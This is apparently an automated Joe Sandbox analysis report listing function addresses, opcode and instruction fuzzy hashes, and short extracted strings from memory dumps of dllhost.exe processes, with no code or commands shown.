Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea93e84d60fef8a6471b174b2bc24e6b883aeea52c0e8c4e5cadf5acf51056c
Instruction ID: e6cc52103f3fcc46451140b0274cda5c6eedec88cbdb288fe29f0a3a54887733
Opcode Fuzzy Hash: eea93e84d60fef8a6471b174b2bc24e6b883aeea52c0e8c4e5cadf5acf51056c
Instruction Fuzzy Hash: E7112531B0D25C8FE722EBA888601EC7FB0EF52310F0640B3C054DB2A2EA7456058B80

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef131cb522a5a37f39e31dc9e769a1449aa4da52ae05c791b4ea1e719949e20e
Instruction ID: d164d74f3963f671a9d399346b4e7a96b5cc4e9f08b7ed05a62762d34d9ca2da
Opcode Fuzzy Hash: ef131cb522a5a37f39e31dc9e769a1449aa4da52ae05c791b4ea1e719949e20e
Instruction Fuzzy Hash: D401D631A0D29C8FE722DBA8C8601DD7FB0EF52310F1541F7D054DB2A2DA7456458B80

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef31c10d4458536d21acf654e4190cda8b47d0bef1a805d7ed44298c28e51f0
Instruction ID: 20802f59bde97c301dd5e9b345a6f363c5aac8770f02b3ef939c2b8106521135
Opcode Fuzzy Hash: bef31c10d4458536d21acf654e4190cda8b47d0bef1a805d7ed44298c28e51f0
Instruction Fuzzy Hash: 1801B131A0E28C8FE722EBA8C8601DC7FB0EF56310F1541E7D054DB2A2EA746644CB80

Function 00007FFD9BAB6355 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664e013015f2f44baae1eea52891df8e6d7d5b3196095a0f26b7adfb356b1680
Instruction ID: 1d6ea6cae35963e52d664f9ba32d5833658b93a8cf833ec739901455c664adb0
Opcode Fuzzy Hash: 664e013015f2f44baae1eea52891df8e6d7d5b3196095a0f26b7adfb356b1680
Instruction Fuzzy Hash: 71F0E131648A188FDF94DF48C499EE973B1FBA8301F114199D44AD72A1DA74EAC4CF41

Function 00007FFD9BAB3C50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction ID: 603bec44fd0a14084be405ccafd15459f321dc49df9fa70c445e0d7c55e1444e
Opcode Fuzzy Hash: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction Fuzzy Hash: 33E01220F1913E4BF774AB94C8603BA6191AF94300F1200B9D51DA32E2DDB86E818F44

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction ID: e5d351356e2d5641432ef330e74628a354c33c02fb27340905700f44cac165af
Opcode Fuzzy Hash: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction Fuzzy Hash: C3C00205F5B52E01E43573AB54660ACA1409BD5A10FD70176D529900A198DD22D5095A

Function 00007FFD9BAB05D5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction ID: b1e87a13519ebbfe8bb18a621cb3bba385a2b548f07e6c5e4e69379d8009ece4
Opcode Fuzzy Hash: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction Fuzzy Hash: ECB09231EABA1E81DA3933B588620687150AB45204FE602B5D429801A1E8EF56D74A42

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction ID: 8496adba37a8fc4f0301b980a15ec7fd161aeee609ba40c3e87c639e8d89e795
Opcode Fuzzy Hash: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction Fuzzy Hash: 6EB01200D5741F01E43433FB089206870409B44100FC300B0D41E900A198CD13D40646

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 189COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FFD9BAB0B4E
"s9, xrefs: 00007FFD9BAB0B46
#{9, xrefs: 00007FFD9BAB0B3E
c9, xrefs: 00007FFD9BAB0B56

Memory Dump Source

Source File: 00000000.00000002.1901373328.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: f2bdf695bce83e0d59e6a7cfeec1ae3ecc66448e446e38bc8ff99103df93bada
Instruction ID: adfb4375f6f4ac5f4da22a464742b246a025fa1b39eefa7662677e7b1c5d80c8
Opcode Fuzzy Hash: f2bdf695bce83e0d59e6a7cfeec1ae3ecc66448e446e38bc8ff99103df93bada
Instruction Fuzzy Hash: 31518E06B0957646E23973FD78219E9AB449FA927FB0847B7F56E8D0C74C486081C3E9

Analysis Process: dllhost.exePID: 7580, Parent PID: 7468COMMON

Executed Functions

Function 00007FFD9BAD0D77 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1abb641d8744581cde8be4d47f779bfb613c1ae62edfbd861c9caf813abcc34e
Instruction ID: a1c55f63cb82503da8869c6562c7893f85c4cdfad32bd30e0838677dd3e7aa4d
Opcode Fuzzy Hash: 1abb641d8744581cde8be4d47f779bfb613c1ae62edfbd861c9caf813abcc34e
Instruction Fuzzy Hash: 1891C2B2A19A894FEB5DEB6888757A97FE0FF99314F0002BED049D76E6CEB41404C740

Function 00007FFD9BAD08D0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992d6344c29c691f329413d157622f1a4942591bb97c118daa51f32890f27d47
Instruction ID: 4afb33444071cf0abc9e69c9bd6771a4e6b076f5d5edb538fb77670e18635e65
Opcode Fuzzy Hash: 992d6344c29c691f329413d157622f1a4942591bb97c118daa51f32890f27d47
Instruction Fuzzy Hash: 59412A22B0C5190EE719F7BC64A56FD7781DFD932AB4406BBE40DCB1EBDD186842C285

Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2321992b6ea841b94f1a18782783b3b5ae707242c7b50bdf892831e655a79d3
Instruction ID: acdf66a955dc214835b2ec131b23b84c6de4fa383474b540e9f26bcb0e2854a5
Opcode Fuzzy Hash: e2321992b6ea841b94f1a18782783b3b5ae707242c7b50bdf892831e655a79d3
Instruction Fuzzy Hash: F4315931B0E2498FE732ABA898751EC3B60EF82325F4542B7D0588A1E3D9782645C785

Function 00007FFD9BAD11A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a176ca98cab8581d5ea4074715d30fcdf8bff721367eb00477f50b5cdd4126b2
Instruction ID: aab3e46f81e8f8e1beae6712f07e1389cc4b8a6a864c74b3e369d13df080c917
Opcode Fuzzy Hash: a176ca98cab8581d5ea4074715d30fcdf8bff721367eb00477f50b5cdd4126b2
Instruction Fuzzy Hash: 55317430A0D68E8FDB55EB68C8649AD7BF0FFA6300B0506BBD049D71F2DA68A941C750

Function 00007FFD9BAD0998 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffaaac1ae687de5e5a5156ee2c07197d07b348678534ee75868b1ab7e3fbb939
Instruction ID: 6093e194e74fc2e28566a888781fb7b36cb0e15e899cd6a7d687043bd387ae53
Opcode Fuzzy Hash: ffaaac1ae687de5e5a5156ee2c07197d07b348678534ee75868b1ab7e3fbb939
Instruction Fuzzy Hash: 4F212821B1C91D0FE79CB76C986A77972D2EBD8325F4102BAE40DC72E6DC54AC024285

Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f41c72d5a98374f4d05521bea222552b27bf88a1008677b02111eae710f56ac
Instruction ID: 0e0a916c4a31e705bf6c231def3a4de2680bb7644d3c89d663936b5f46b238c1
Opcode Fuzzy Hash: 5f41c72d5a98374f4d05521bea222552b27bf88a1008677b02111eae710f56ac
Instruction Fuzzy Hash: E611C235B0E68D8FE722DBA888711EC7FB0EF92711F4642B7D084DB2A2D5782645C784

Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d40f3a3afd95fd30da69f2058cbbe610d6ad0f7a66e650e35e981cb4127959f
Instruction ID: cc91bcaabbd1d50214344466bb7f21b08555aa88a46fdec2f71d65ec20380da6
Opcode Fuzzy Hash: 9d40f3a3afd95fd30da69f2058cbbe610d6ad0f7a66e650e35e981cb4127959f
Instruction Fuzzy Hash: 3111E131A0E28C8FE722DBA888701DC7FB0EF92711F4642F7D044DB2A2D5782645C780

Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07926d2e4880209df2d40b16254644f2c9d1c6329717e086eed3e748c1bf713e
Instruction ID: 6845cca895e3c325359f579224e2858219e75dd8ab73d45457ec897ff7e88262
Opcode Fuzzy Hash: 07926d2e4880209df2d40b16254644f2c9d1c6329717e086eed3e748c1bf713e
Instruction Fuzzy Hash: A201DE31A0E38C8FE722DBA8C86019C7FB0EF82701F4642E7D044DB2A2D9786A44C780

Function 00007FFD9BAD6355 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84649961d0dc998db0687918131c94920eb3c168c9c68ce032adf60d7546344
Instruction ID: 155852e656c778d1d5ef2e703855bbf19a9720dda43474a4c4ccfc1f5c6a1d0b
Opcode Fuzzy Hash: e84649961d0dc998db0687918131c94920eb3c168c9c68ce032adf60d7546344
Instruction Fuzzy Hash: E8F0E130648A188FDF58DF48C499EE973B1FBA8301F114299D44AD72A1DA74EAC4CF41

Function 00007FFD9BAD0B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde58076314183005c88f4966fa5e7325086d0b7ebb98a0a19dc573b861ea668
Instruction ID: d07170550bbcda694699e38dfee93849c44a2ed7cee3a92dd23b8f246a121c2d
Opcode Fuzzy Hash: cde58076314183005c88f4966fa5e7325086d0b7ebb98a0a19dc573b861ea668
Instruction Fuzzy Hash: F2F0A03425A549CFC741DB7CC8A44D5BBA0FF07254B5616E9D089DB1B1D321686DCB41

Function 00007FFD9BAD3C50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction ID: b403b92ec83e70d91e27d66d4e830474401b292a35e151cb20c7725fff500af8
Opcode Fuzzy Hash: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction Fuzzy Hash: AFE0ED20F0911E4BF774A794C8603BE61A1EFD4700F121175D50DA32E2DDB86E818B44

Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48781142f884e6f093e871f3f66298c14f921c658e672678bb424993ac8180
Instruction ID: 2f8618857835766a776c39eae4ec3e9ace9fee01b353dadf93a7c277d173d267
Opcode Fuzzy Hash: 2a48781142f884e6f093e871f3f66298c14f921c658e672678bb424993ac8180
Instruction Fuzzy Hash: 4BC00205F5B91E01E43577AA54760ACA5409BD5A10FD70272D509840B198DD22D5815E

Function 00007FFD9BAD05D5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction ID: ccb3c7b4265f1e4d218afacd1f2606ef353068f25e0da19eac1bfe080880efa4
Opcode Fuzzy Hash: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction Fuzzy Hash: 0CB09224E9BA0E81DA3933B588620687154AB85204FE603B5D449801A1E8EF56D74242

Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction ID: da69216dd1b85e70fc70ccae865b6533c49989f15ad51abacd99b91e76d28208
Opcode Fuzzy Hash: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction Fuzzy Hash: 0CB01200D5780F01E43433FA08A606870409BC5100FC302B0D40D800B198CD13D40246

Non-executed Functions

Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 186COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BAD0B3E
"s9, xrefs: 00007FFD9BAD0B46
!k9, xrefs: 00007FFD9BAD0B4E
c9, xrefs: 00007FFD9BAD0B56

Memory Dump Source

Source File: 00000031.00000002.2224232708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_49_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: cae06e7f37a316b892c91aa766ee749a2435a25f11ac27e96fce3e9efa4990ed
Instruction ID: d4a06384a2880a15e7ffbb279b44844fd7217e2c05453cae4d0d92294e02cdd3
Opcode Fuzzy Hash: cae06e7f37a316b892c91aa766ee749a2435a25f11ac27e96fce3e9efa4990ed
Instruction Fuzzy Hash: FC51AE02B0946605E23A73FD78228F96B449FA927FB4847B7F45E8D0EB4D096086C2E5

Analysis Process: dllhost.exePID: 6732, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9BAC0B3F Relevance: 3.0, Strings: 1, Instructions: 1758COMMON

Download Yara Rule

Strings

X_L, xrefs: 00007FFD9BAC19D4

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bac0000_dllhost.jbxd

Similarity

API ID:
String ID: X_L
API String ID: 0-1847528528
Opcode ID: cdf585c945c2c826e697cf3ebe51340e2227a6fcc198b49af0c6aaaca1c9c824
Instruction ID: 13092e3f591f207a3116f5528476b6ede29b120ebe2fb1f8f307b29d781f85e3
Opcode Fuzzy Hash: cdf585c945c2c826e697cf3ebe51340e2227a6fcc198b49af0c6aaaca1c9c824
Instruction Fuzzy Hash: 48C2E231F1991E4FEBA8EB5884A16B87392FFA8350F0505B9D05DC72E7DE74AD418B80

Function 00007FFD9BAE14E5 Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aacffa7734edd430dcd6434943e0b1c3dde04ad7e42731123010b390b312622f
Instruction ID: ce6f21e7bcb93d09acde550ea8b16e5dbd29c870050dce3ed16904b5afe812c0
Opcode Fuzzy Hash: aacffa7734edd430dcd6434943e0b1c3dde04ad7e42731123010b390b312622f
Instruction Fuzzy Hash: 61C1CF21F2E65E0BE32D5B584C920B537D1EBA2309B19877DD4DBC3097D978A507C2C1

Function 00007FFD9BAB0D77 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b4d3125343ce625bfdd3d0e916d37fb6d33d88b4f7a72d859b4cfad2bb71be
Instruction ID: 72a44c8269b78101d90c6d2bdf606efc9a0cad6171d4674e125d94b96ab5ef55
Opcode Fuzzy Hash: f1b4d3125343ce625bfdd3d0e916d37fb6d33d88b4f7a72d859b4cfad2bb71be
Instruction Fuzzy Hash: E791C272A18AAD4FE79DDB6888697A97FF0FF59314F0001BED099D76E6CAB414108B40

Function 00007FFD9BADAC9C Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

E, xrefs: 00007FFD9BADC043

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 41c08b137ea25da30b9815fbe6a3de86bb567ea877f8c0f5272ca49d25c4021c
Instruction ID: a5100a81957ce14a5c356b37088b900b72d9ede1edf0a236c0b5097dd80f505b
Opcode Fuzzy Hash: 41c08b137ea25da30b9815fbe6a3de86bb567ea877f8c0f5272ca49d25c4021c
Instruction Fuzzy Hash: 53716D31A1DB898BE774DF58C4517AAB3E1FFC8310F514A3DD18DC32A2DA78A9418B42

Function 00007FFD9BADAD02 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

1, xrefs: 00007FFD9BADB329

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: 1
API String ID: 0-2212294583
Opcode ID: a3e7f53b368505b7ed4f9a1d066269d5465c858be5428adf02579f61ae48009c
Instruction ID: e23a110405bf5c2811acb4d8edc3ce1035f4a4b8f91827bfa62ddaaba18a0613
Opcode Fuzzy Hash: a3e7f53b368505b7ed4f9a1d066269d5465c858be5428adf02579f61ae48009c
Instruction Fuzzy Hash: C9115E31A1CB948BD738DF18C8417AAB7E1FBD8710F154A2ED18E93261CB34B9418B83

Function 00007FFD9BAD98D1 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD98B6

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: f943848c894d3ad265338dfa9560f82679cff4188a50ca64e2f0cedf75f2c5bc
Instruction ID: 38d604f337659fc0edf173207e66b235a5da460cbe1f83b8ec6c2bf712ccb239
Opcode Fuzzy Hash: f943848c894d3ad265338dfa9560f82679cff4188a50ca64e2f0cedf75f2c5bc
Instruction Fuzzy Hash: 5211A571A0E7CC4FDB169BB488698987FB0EF96210B4A41FFD449CB1B3E9298949C701

Function 00007FFD9BADE7A9 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BADE816

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: cc53a91e082cb30e89aeeaf8daa2af7e9998c4d357e806cf0bff1e14bec5f9f9
Instruction ID: 62822c0de5ca67075f6d54d4fa527cbea6663e6a7c018bdc00e5453dc961a612
Opcode Fuzzy Hash: cc53a91e082cb30e89aeeaf8daa2af7e9998c4d357e806cf0bff1e14bec5f9f9
Instruction Fuzzy Hash: 2E01FE31F0A58C4FCB65EBB484688E9BFA0EF96240F4642FED449CB166ED399646C740

Function 00007FFD9BADE7F9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BADE816

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 737010da9d4ad085a135564e19cdacf666033f412328eb61ea4f45582ef6dbc6
Instruction ID: 080fe07a339f157f4ff78dc2c1fb88dd11b1594846fe35ce128a7e642e93bec4
Opcode Fuzzy Hash: 737010da9d4ad085a135564e19cdacf666033f412328eb61ea4f45582ef6dbc6
Instruction Fuzzy Hash: C7E0D17164E3C44FC716D63544644557F60DF6720174642FEC045CF1A7EA2DCC46C701

Function 00007FFD9BAE33A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAE33C6

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9f690744497b5bb53126d0db688e66113aebace32011fac5521a4cdb06722eef
Instruction ID: 7de40fcb7ff32424f770444b176986cc69663104732be1f41a6eb94e8a35e081
Opcode Fuzzy Hash: 9f690744497b5bb53126d0db688e66113aebace32011fac5521a4cdb06722eef
Instruction Fuzzy Hash: C9E0656160E7C44FC71AE6344869855BFB0EF6721174A51EFC045CF1A3DA1D9889C701

Function 00007FFD9BAEA9D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAEA9F6

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 007e3df9521155be49c756fd29a13c3b473c42b8900e035d85853915521b17c4
Instruction ID: c6d49b0f511954a5ae7448deb4591acf2a411de13f40867a7f31c5067b29252c
Opcode Fuzzy Hash: 007e3df9521155be49c756fd29a13c3b473c42b8900e035d85853915521b17c4
Instruction Fuzzy Hash: EEE06D6160E7C48FC71AAA348869454BFA0EF6720174A42EFC046CF1A3EA2D8889C701

